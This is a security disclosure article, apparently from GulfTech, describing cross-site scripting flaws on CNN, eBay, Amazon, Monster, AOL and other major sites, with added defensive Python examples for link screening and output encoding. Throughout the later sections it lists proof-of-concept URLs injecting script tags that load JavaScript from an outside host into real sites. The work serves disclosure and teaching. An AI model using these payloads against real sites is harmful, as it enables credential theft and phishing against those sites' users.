When Small Mistakes Can Cause Big Problems
September 18, 2021
What do popular websites such as Amazon, eBay, half.com, CareerBuilder, AOL,
CNN, MTV, VH1, HBO and many others have in common? Well, aside from being
amongst the most popular places on the internet, they also share a common flaw:
Cross Site Scripting.
What Is "Cross Site Scripting"?
Cross Site Scripting occurs mostly from a lack of input validation within a
vulnerable web application. This can allow an attacker to send a victim a
malicious link which will then render malicious code in the context of the
victim's browser. In other words, Person A can tell Person B "Hey, have a look
at this cool website!" Person B has probably heard all about recent viruses and
the like, and knows not to open attachments from unknown sources, to keep an
up-to-date antivirus program, and to make sure their operating system has all of
the required security patches. Person B probably does not think much about
visiting this website; except that when he does, Person A's malicious code is
executed. This is definitely not a good scenario, and has been officially
recognized since February 2002 by such various agencies as the CERT Coordination
Center, DoD-CERT, the DoD Joint Task Force for Computer Network Defense, the
Federal Computer Incident Response Capability, and the National Infrastructure
Protection Center as a very real attack vector.
The Risks Of Cross Site Scripting
Let's assume that in the example given earlier between Person A and Person B,
the website used to render the malicious code was some less trusted website
such as a blog or personal site. This probably poses a smaller risk, because not
only would any smart user's suspicions be higher, but also any data that could be
stolen is probably insignificant compared to financial data and sensitive personal
information. Now what if the same scenario presented itself on some major eCommerce
website such as Amazon or eBay? The stakes are much higher for a few reasons. One
is that the data stored on the website is much more sensitive (financial and
personal information) and greatly desired by an attacker, and the other is that
the site is much more trusted because of its size and reputation. The problem with
the second scenario is that it is not theoretical, but real.
The Problem Is Real!
In the past few weeks GulfTech Security Research was able to find cross site
scripting issues that existed on eBay, Amazon, Half.com, HBO, CareerBuilder,
AOL, CNN, MTV, and many others. The cross site scripting issues on these websites
could allow an attacker to take control of arbitrary accounts, or steal sensitive
info. Websites such as eBay, Amazon, and Half.com (for example) have fairly good
security when it comes to protecting their users' accounts, but even they are
vulnerable to data theft via these vulnerabilities. For example, it may be somewhat
useless to steal a victim's cookie, try to render malicious code, or force
command execution on a website with tight account security. So instead of relying
on some great technological advantage, an attacker could simply attempt to take
advantage of the human element and have the victim simply give the attacker their
account information. This can be done by using the cross site scripting
vulnerabilities to temporarily deface a website. So, instead of rendering malicious
code or trying to steal a user's cookie, the attacker can link to an offsite
JavaScript and have it render a login form using the vulnerable website's own HTML
and style sheet so that it looks nearly identical to the legitimate login form. Of
course, when a victim logs in to this form it actually just steals their login
credentials. The attacker could also use the same methods of temporarily defacing
the website to show someone a fictitious news story on a major news website.
How To Protect Yourself
The only foolproof way to protect yourself from these kinds of attacks is to turn off
script support in your browser. This, however, greatly reduces the functionality of your
browser in most cases. Other measures you can take to protect yourself are to examine
links before you follow them. If you see something funny in the URL, such as an unusual
number of hex characters, markup language, or script, then you probably do not want
to follow the link. It is also best not to check the "remember my password" option
that a lot of sites make available. These steps will help you keep safe, but the
majority of this problem comes from unsafe programming practices, and should be
eliminated by the developers before a site is made publicly available.
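The link-inspection advice above can be turned into a simple screening tool. The following is an added example, not code from the original article or from GulfTech: it percent-decodes each query parameter (and the path) of a link, repeating the decoding so a double-encoded payload is not missed, and flags markup, script or event-handler fragments as well as a query string dominated by %XX escapes. The sample URLs, the hostnames under example.invalid and the 0.3 hex-ratio threshold are constructed for this example; the regular expression is a heuristic for screening links, not a replacement for output encoding on the server.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Markup or script fragments that have no business in a search term, a
# username or a page name. Heuristic only (assumption: good enough to
# screen links before following them, not a server-side defence).
SUSPICIOUS = re.compile(r"<|>|javascript:|\bon[a-z]+\s*=", re.IGNORECASE)
PCT_ESCAPE = re.compile(r"%[0-9A-Fa-f]{2}")

# Constructed sample links in the shape of the ones quoted in the article.
BENIGN_URL = "http://search.example.invalid/search?q=cross+site+scripting&page=1"
INJECTED_URL = ("http://search.example.invalid/search?q=%22%3E%3Cscript%20src%3D%22"
                "http%3A%2F%2Fevil.example.invalid%2Fx.js%22%3E%3C%2Fscript%3E")
DOUBLE_ENCODED_URL = "http://search.example.invalid/search?q=%2522%253E%253Cscript%253E"
PATH_INJECTED_URL = "http://shop.example.invalid/detail/-/0000000000/%22%3E%3Cscript%3E/ref=x"


def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing, so a payload hidden
    behind double encoding (%2522 -> %22 -> ") is still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def hex_ratio(query: str) -> float:
    """Fraction of the query string taken up by %XX escapes: the article's
    'unusual number of hex characters'."""
    if not query:
        return 0.0
    return 3 * len(PCT_ESCAPE.findall(query)) / len(query)


def suspicious_parts(url: str) -> list:
    """Names of query parameters (or 'path') whose decoded value contains
    markup, script or an event-handler attribute."""
    parts = urlsplit(url)
    hits = []
    if SUSPICIOUS.search(decode_fully(parts.path)):
        hits.append("path")
    # parse_qsl decodes one layer itself; decode_fully handles the rest.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if SUSPICIOUS.search(decode_fully(value)):
            hits.append(name)
    return hits


def is_suspicious(url: str, hex_threshold: float = 0.3) -> bool:
    """Flag a link if any part carries markup/script or the query is mostly escapes."""
    return bool(suspicious_parts(url)) or hex_ratio(urlsplit(url).query) > hex_threshold


if __name__ == "__main__":
    for url in (BENIGN_URL, INJECTED_URL, DOUBLE_ENCODED_URL, PATH_INJECTED_URL):
        print(f"{is_suspicious(url)!s:5} {suspicious_parts(url)} {url}")
```

The path is checked as well as the query string because several of the links quoted in this article carry the injected markup in the path rather than in a parameter.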
See The Problems In Action
Before showing any real world examples, it is VERY important to know that GulfTech
Research and Development does not condone the use of these flaws for malicious purposes.
In fact, we heavily discourage it. These examples are here for information purposes only,
and to give both consumers and web developers a look at what not to do and what kind of
links NOT to follow. I have made attempts to contact the affected websites before writing
this article. Only a few responded, and even some of those did not get it right. CNN, for
example, was one of the few that responded, and seemed to have fixed the problem shortly
after. The problem, though, was that if I entered any script in an unorthodox manner, such
as varying the case (sCrIPt) or tying script attributes to another tag, then the code would
still be executed. Now, it seems that no type of protection is there at all. This could
allow a malicious user to attack accounts within the cnn.com domain, spoof a login form
that sends the attacker the victim's login credentials, or put up their own bogus news
story and make it look flawlessly legit by viewing the output source code and injecting
their defacement in such a manner that the flow of the code is not interrupted at all. In
this example we see the GTRAD name in big letters, but we also see broken tags which make
it look sloppy and suspicious; as I said before, this can be avoided.
http://search.cnn.com/pages/search/advanced.jsp?Coll=cnn_xml&QuerySubmit=true&Page=1&QueryText=%22%3E%3Cscript%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E
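The CNN fix described above failed because it was a blacklist: it removed one spelling of one tag and left the attribute context itself unprotected. The example below is added here and is not code from the article or from any of the named sites. It renders a constructed search-results fragment that echoes the query inside a double-quoted attribute, first through a naive blacklist of the kind the article describes and then through contextual HTML encoding (Python's html.escape with quote=True), and checks whether the untrusted value managed to change the page structure. The payload strings, the fragment template and the example.invalid hostname are constructed for this example.

```python
import html

# Constructed payloads that mirror the pattern of the links quoted above:
# close the attribute with a quote, then open a tag (in mixed case, which a
# lowercase-only filter ignores) or attach an event handler to the existing tag.
MIXED_CASE_PAYLOAD = '"><sCrIpT src="http://example.invalid/x.js"></sCrIpT>'
ATTRIBUTE_PAYLOAD = '" onfocus="run()'


def naive_blacklist(user_input: str) -> str:
    """The kind of filter the article describes being bypassed: it strips a
    literal lowercase '<script' and nothing else, so case variants and event
    attributes on other tags pass straight through."""
    return user_input.replace("<script", "")


def encode_for_html(user_input: str) -> str:
    """Contextual output encoding: every character with meaning in HTML
    (< > & " ') becomes an entity, so the value can never leave the
    attribute it is written into. This is what the article's closing advice
    to developers amounts to in practice."""
    return html.escape(user_input, quote=True)


def render_search_page(query: str, sanitizer) -> str:
    """Constructed search-results fragment: the query is echoed inside a
    double-quoted attribute value, the same context as the links above."""
    return f'<input name="q" value="{sanitizer(query)}">'


def survives_injection(rendered: str) -> bool:
    """True when untrusted input changed the page structure. The fragment
    should contain exactly one '<' (the input tag) and four '"' (two
    attributes); anything else means a new tag or attribute was created."""
    return rendered.count("<") != 1 or rendered.count('"') != 4


if __name__ == "__main__":
    for payload in (MIXED_CASE_PAYLOAD, ATTRIBUTE_PAYLOAD):
        for name, fn in (("blacklist", naive_blacklist), ("encode", encode_for_html)):
            page = render_search_page(payload, fn)
            print(f"{name:9s} injected={survives_injection(page)!s:5} {page}")
```

The structural check is deliberately crude; its only job is to make the difference visible. The point of the example is that the encoder never needs to know which tag names or spellings an attacker might use, because it works on the characters that delimit HTML rather than on a list of bad words.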
CNN is not the only large and trusted news website affected though. Another example is ABC
News. The vulnerability present in ABC News is sort of an example of what I will be talking
about next.
http://infospace.abcnews.com/_1_2B4MUKW03Y7ZYZZ__info.abcnws/dog/results?otmpl=dog/webresults.htm&qcat=web&ran=&qkw=%22%3E%3Cscript%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E%3C!--%3C!--
Another scenario is large domains putting their trust in someone else's code. Take for
example the issues in LiveWorld products that GulfTech released a few weeks ago. The
vulnerabilities affected the likes of HBO, eBay, and others. The affected companies did not
host the vulnerable software, LiveWorld did. The problem is that the DNS of the parent
domains was still used:
http://answercenter.ebay.com/search.jsp?q=%22%3E%3Cscript+src%3D%22http%3A%2F%2Fstuff.gulftech.org%2Ffoobar.js%22%3E%3C%2Fscript%3E%3C%21--%3C%21--
http://groups.ebay.com/findclub!execute.jspa?q=%22%3E%3Cscript+src%3D%22http%3A%2F%2Fstuff.gulftech.org%2Ffoobar.js%22%3E%3C%2Fscript%3E%3C%21--%3C%21--
http://forums.ebay.com/search.jsp?q=%22%3E%3Cscript+src%3D%22http%3A%2F%2Fstuff.gulftech.org%2Ffoobar.js%22%3E%3C%2Fscript%3E
http://boards.hbo.com/search!execute.jspa?q=%22%3E%3Cscript+src%3D%22http%3A%2F%2Fstuff.gulftech.org%2Ffoobar.js%22%3E%3C%2Fscript%3E%3C%21--%3C%21--
What does this mean? Well, it can affect both the human element and the technical element.
On one hand an attacker could possibly steal information associated with the parent domains,
such as cookie information, and in cases where that was not a preferred avenue of attacking
a victim a malicious user may temporarily deface a webpage with a spoofed login form.
Because the user trusts the domain, the second example is more easily carried out.
LiveWorld fixed these issues after I made them public, but never did respond when I informed
them of the issues in advance of the public release.
So, what could be worse than what we have already talked about? How about an attacker gaining
access to sensitive personal and financial data? Well, this is a possibility, and you will
soon see how. Let's think about some websites that are becoming household names when it comes
to commerce and employment. Employment websites, for example, usually require a good deal of
personal information. Monster and CareerBuilder are probably two of the most popular websites
available for both job seekers and employers. Unfortunately they are also vulnerable to the
same cross site scripting issues I talked about before.
http://my.monster.com/viewresume.asp?nextpage=home.asp%22%3E%3Cscript%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E&resumeid=RESUMEIDHERE&original=current
http://www.careerbuilder.com/share/Login.asp?sc_cmp2=JS_HP1_Nav_MyCB%22%20//--%3E%3C/script%3E%3C/script%3E%3Cscript%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E%3Cscript%3E%3C!--%20var%20blah=%22
Seeing as how identity theft is on the rise, vulnerabilities on major employment websites
such as these could be potentially devastating if successfully exploited. Now let’s talk
about eCommerce. Earlier I pointed out ways eBay users could be attacked, so I will not
talk about eBay again here even though it definitely falls into this category, but I will
talk about eBay's half.com as well as Amazon and others. These are the same types of attacks,
and can potentially lead to the same consequences.
http://half.ebay.com/search/search.jsp?nthTime=&product=all&keyword=%22%3E%3Cscript%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E&x=0&y=0
http://www.amazon.com/exec/obidos/tg/detail/-/0802132952/%22%3E%3E%3Cscript%20src=http://stuff.gulftech.org/foobar.js%3E%3C/script%3E/ref=pd_sim_books_3/104-8941545-9279926/103-1795435-7689412?v=glance&s=books
Both Half.com and Amazon do a fairly good job of protecting users' accounts. Stealing cookies
may be of little use, but spoofed login forms and even performing some forced command execution
are definitely possible. Sure, these are all interesting, and for some of us equally worrisome,
but it seems a bit humorous when large technical entities leave themselves open to these
same kinds of attacks. Who would allow this, you ask? Well, AOL, Veritas, Intel, and many others.
http://www.aol.com/support/index.adp?toc=%22%22%20//--%3E%3C/script%3E%3C/script%3E%3Cscript%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E%3Cscript%3E%3C!--%20var%20blah=%22
http://search.intel.com/support/search.asp?q1=%22%3E%3Ch1%3EGulfTech%20Research%20And%20Development%3C/h1%3E%3C!--%3C!--%3C!--%3C!--%3C!--
http://forums.veritas.com/discussions/search!execute.jspa?q=%22%3E%3Cscript+src%3D%22http%3A%2F%2Fstuff.gulftech.org%2Ffoobar.js%22%3E%3C%2Fscript%3E%3C%21--%3C%21--
I hope that as a user you have a better idea of what to look out for, and know that these
types of attacks are very real and can be exploited, and that a very large number of your
favorite sites could be vulnerable to these attacks.
http://searchb.disney.go.com/disneySearch?col1=disney%20store%20parks%20video&qt=%22%3E%3Cscript%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E
http://faq.orbitz.com/cgi-bin/orbitz.cfg/php/enduser/std_search_custom.php?p_new_search=1&p_search_text=%22%3E%3Cscript+src%3D%22http%3A%2F%2Fstuff.gulftech.org%2Ffoobar.js%22%3E%3C%2Fscript%3E%3C%21--%3C%21--
http://www.mtv.com/community/profiles/profile_not_found.jhtml?username=%22%3E%3Cscript%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E
http://www.vh1.com/search/search_shows.jhtml?sorttype=by_name_asc&searchtype=show&searchterm=%22%3E%3Cscript%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E
The best way to learn to be safe is to know the risks, and become familiar with potential
attack types. I hope this article has helped with this.
Disclaimer
GulfTech Security Research has discovered all of these XSS issues independently. We are in no
way affiliated with any of the named companies. We greatly discourage the use of these examples
for malicious purposes, and cannot be held responsible for any individual's actions. If
you would like to use any of these examples on your website, feel free to as long as you give us
credit and do not use them for malicious purposes.
References
Possible Security Issues In LiveWorld Products
http://www.gulftech.org/?node=research&article_id=00044-08232004
CERT® Advisory CA-2000-02: Malicious HTML Tags Embedded in Client Web Requests
http://www.cert.org/advisories/CA-2000-02.html
The Cross Site Scripting FAQ
http://www.cgisecurity.com/articles/xss-faq.shtml
Preventing Cross-site Scripting Attacks
http://www.perl.com/pub/a/2002/02/20/css.html